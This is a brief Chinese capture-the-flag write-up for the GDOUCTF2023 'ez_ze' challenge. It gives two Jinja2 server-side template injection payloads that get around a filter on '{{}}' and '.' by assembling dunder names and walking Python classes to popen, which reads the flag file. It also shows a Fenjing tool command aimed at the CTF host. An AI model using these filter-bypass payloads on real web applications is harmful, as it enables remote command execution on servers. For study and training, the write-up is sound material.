GDOUCTF2023-<ez_ze>-wp

题目链接

{{}}, .被过滤 payload:

1
2
3
4
5
6
7
8
9
10
name={% set po=dict(po=a,p=b)|join%}
{% set a=(()|select|string|list)|attr(po)(24)%}
{% set ini=(a,a,dict(in=a,it=b)|join,a,a)|join()%}
{% set glo=(a,a,dict(glo=a,bals=b)|join,a,a)|join()%}
{% set cls=(a,a,dict(cla=a,ss=b)|join,a,a)|join()%}
{% set bs=(a,a,dict(bas=a,e=b)|join,a,a)|join()%}
{% set geti=(a,a,dict(get=a)|join,dict(item=a)|join,a,a)|join()%}
{% set subc=(a,a,dict(subcla=a,sses=b)|join,a,a)|join()%}
{%set pp=dict(pop=a,en=b)|join %}
{%print(()|attr(cls)|attr(bs)|attr(subc)()|attr(geti)(132)|attr(ini)|attr(glo)|attr(geti)(pp)(‘tac /flag’)|attr(‘read’)() )%}

或者

1
{%set u='%c'%95*2%}{%print(''|attr(u+'cla''ss'+u)|attr(u+'ba''se'+u)|attr(u+'su''bcla''sses'+u)()|attr(213)|attr(u+'i''n''i''t'+u)|attr(u+'glo''bal''s'+u)|attr('ge''t')(u+'bui''lti''ns'+u)|attr('ge''t')(u+'imp''ort'+u)('o''s')|attr('po''pen')('ca''t /f''lag')|attr('re''ad')())%}

或者直接用fenjing https://github.com/Marven11/Fenjing

1
2
$ pip3 install fenjing
$ python3 -m fenjing crack -u "http://node5.anna.nssctf.cn:28879/get_flag" -i "name"
本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP